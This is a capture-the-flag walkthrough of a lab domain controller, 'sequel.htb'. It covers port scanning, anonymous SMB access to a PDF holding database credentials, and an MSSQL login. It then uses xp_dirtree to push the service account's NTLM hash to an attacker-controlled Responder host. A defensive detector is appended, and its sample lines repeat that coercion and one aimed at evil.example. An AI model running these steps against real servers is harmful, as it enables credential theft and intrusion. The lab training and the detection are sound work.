1. Enumeration
1-1 Run nmap
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nmap -p- --min-rate 10000 10.129.12.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 14:03 KST
Nmap scan report for 10.129.12.199
Host is up (0.29s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49710/tcp open unknown
49714/tcp open unknown
64976/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 22.27 seconds
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nmap -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV 10.129.12.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 14:06 KST
Nmap scan report for 10.129.12.199
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-16 13:06:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-16T13:08:15+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-16T13:08:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.12.199:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.129.12.199:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-04-16T13:08:15+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-16T12:58:11
|_Not valid after: 2054-04-16T12:58:11
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-16T13:08:15+00:00; +8h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-16T13:08:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-04-16T13:07:38
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.60 seconds
The LDAP domain sequel.htb and the DC hostname dc.sequel.htb were added to the hosts file.
1-2 Inspect the TLS certificate with openssl
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# openssl s_client -showcerts -connect 10.129.228.253:3269 | openssl x509 -noout -text
Can't use SSL_get_servername
depth=0
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0
verify return:1
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
1e:00:00:00:0b:32:65:84:5d:2c:49:13:22:00:00:00:00:00:0b
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC = htb, DC = sequel, CN = sequel-DC-CA
Validity
Not Before: Jan 18 23:03:57 2024 GMT
Not After : Jan 5 23:03:57 2074 GMT
Subject:
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
1.3.6.1.4.1.311.21.7:
0).!+.....7.....v...V...5...Y...5.w.!..n...
X509v3 Extended Key Usage:
TLS Web Client Authentication, TLS Web Server Authentication, Microsoft Smartcard Login, Signing KDC Response
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
1.3.6.1.4.1.311.21.10:
010
..+.......0
..+.......0..
+.....7...0...+......
X509v3 Subject Key Identifier:
09:56:E0:66:9E:25:3A:61:B0:B3:5C:FB:6C:FD:C8:9D:F4:E2:1E:23
X509v3 Authority Key Identifier:
62:9F:32:A3:A0:F0:38:20:D4:60:C0:CD:6D:C5:FA:51:30:5E:C3:15
X509v3 CRL Distribution Points:
Full Name:
URI:ldap:///CN=sequel-DC-CA,CN=dc,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint
Authority Information Access:
CA Issuers - URI:ldap:///CN=sequel-DC-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?cACertificate?base?objectClass=certificationAuthority
X509v3 Subject Alternative Name: critical
DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
Signature Algorithm: sha256WithRSAEncryption
Noteworthy: the issuer is CN = sequel-DC-CA, a certificate authority in the sequel.htb domain.
1-3 SMB review
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# crackmapexec smb 10.129.228.253 --shares
SMB 10.129.228.253 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.253 445 DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
With an arbitrary user name and an empty password:
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# crackmapexec smb 10.129.228.253 -u test -p '' --shares
SMB 10.129.228.253 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.253 445 DC [+] sequel.htb\test:
SMB 10.129.228.253 445 DC [+] Enumerated shares
SMB 10.129.228.253 445 DC Share Permissions Remark
SMB 10.129.228.253 445 DC ----- ----------- ------
SMB 10.129.228.253 445 DC ADMIN$ Remote Admin
SMB 10.129.228.253 445 DC C$ Default share
SMB 10.129.228.253 445 DC IPC$ READ Remote IPC
SMB 10.129.228.253 445 DC NETLOGON Logon server share
SMB 10.129.228.253 445 DC Public READ
SMB 10.129.228.253 445 DC SYSVOL Logon server share
Looking further into Public, which is not one of the default shares:
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# smbclient //10.129.228.253/Public -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 20:51:25 2022
.. D 0 Sat Nov 19 20:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 22:39:43 2022
5184255 blocks of size 4096. 1467337 blocks available
smb: \> get SQL Server Procedures.pdf
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \SQL
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (23.4 KiloBytes/sec) (average 23.4 KiloBytes/sec)
The Public share can be accessed without a password, and the PDF on it was downloaded. It describes how to connect to SQL Server and mentions a default account.
Following that guide, connect to MSSQL with impacket's mssqlclient:
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/Responder]
└─# impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.129.228.253
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)> select name from master..systemdatabases;
[-] ERROR(DC\SQLMOCK): Line 1: Invalid object name 'master..systemdatabases'.
SQL (PublicUser guest@master)> select name from master..sysdtabases;
[-] ERROR(DC\SQLMOCK): Line 1: Invalid object name 'master..sysdtabases'.
SQL (PublicUser guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
SQL (PublicUser guest@master)>
Additional enumeration that could be performed:
- DNS zone transfer / subdomain brute forcing
- LDAP review (authenticated and unauthenticated)
- Use the account to run BloodHound
- Use the account to Kerberoast
- Username/password brute forcing against Kerberos
2. Obtaining NTLM
2-1 Start Responder in a separate Kali window to receive the NTLM hash.
responder -I eth0
2-2 From the MSSQL session obtained above, run a directory listing against the share
SQL (PublicUser guest@master)> EXEC xp_dirtree '\\10.10.14.13\share', 1, 1
subdirectory depth file
------------ ----- ----
SQL (PublicUser guest@master)>
- \\10.10.14.13\share: a UNC path pointing to a network share. Here it refers to a share named share on the host 10.10.14.13.
- First 1: tells xp_dirtree to also return information about subdirectories. With 0 only the top-level directory of the given path is listed; with 1 subdirectory information is included.
- Second 1: specifies whether file information is returned as well. With 0 only directory information is returned; with 1 file information is included too.
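Because xp_dirtree (like xp_fileexist and xp_subdirs) makes the SQL Server service account open an SMB session to whatever UNC host is named, a defender can catch this coercion in SQL audit data. The following is an added example, not part of the original writeup: it scans constructed audit lines for these procedures and flags UNC hosts outside an assumed allow-list and corporate range (the allow-list, the 10.129.0.0/16 range and the log format are assumptions for this example).

```python
import re
import ipaddress

# Extended stored procedures that take a path and cause SQL Server to
# authenticate over SMB to the named UNC host (forced authentication).
UNC_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# Assumed allow-list of file servers the SQL service account may reach,
# and the assumed internal network range (constructed for this example).
ALLOWED_UNC_HOSTS = {"dc.sequel.htb", "dc"}
INTERNAL_NETS = [ipaddress.ip_network("10.129.0.0/16")]

# Match "<proc> '\\host\..." and capture the host part of the UNC path.
PROC_RE = re.compile(
    r"\b(" + "|".join(UNC_PROCS) + r")\b\s*'?\\\\([^\\']+)", re.IGNORECASE
)


def unc_host_is_trusted(host):
    """True if the UNC host is an allow-listed name or an internal address."""
    host = host.lower()
    if host in ALLOWED_UNC_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: trust only names inside the domain.
        return host.endswith(".sequel.htb")
    return any(addr in net for net in INTERNAL_NETS)


def find_forced_auth(lines):
    """Return one finding per statement that coerces SMB auth to an untrusted host."""
    findings = []
    for line in lines:
        m = PROC_RE.search(line)
        if not m:
            continue
        proc, host = m.group(1).lower(), m.group(2)
        if not unc_host_is_trusted(host):
            findings.append({"proc": proc, "host": host, "line": line.strip()})
    return findings


# Constructed sample audit lines mirroring the session in this writeup.
SAMPLE_AUDIT = [
    "2024-04-16 13:10:02 login=PublicUser db=master stmt=EXEC xp_dirtree '\\\\10.10.14.13\\share', 1, 1",
    "2024-04-16 13:11:40 login=sql_svc db=master stmt=EXEC xp_dirtree '\\\\dc.sequel.htb\\SYSVOL', 1, 1",
    "2024-04-16 13:12:05 login=PublicUser db=master stmt=select name from master..sysdatabases",
    "2024-04-16 13:13:00 login=PublicUser db=master stmt=EXEC master..xp_fileexist '\\\\evil.example\\x'",
]

if __name__ == "__main__":
    for f in find_forced_auth(SAMPLE_AUDIT):
        print(f"[!] {f['proc']} to untrusted host {f['host']}: {f['line']}")
```

A low-privilege login such as the guest-mapped PublicUser calling these procedures toward a non-corporate address is the signal to alert on; revoking EXECUTE on them from public removes the primitive entirely.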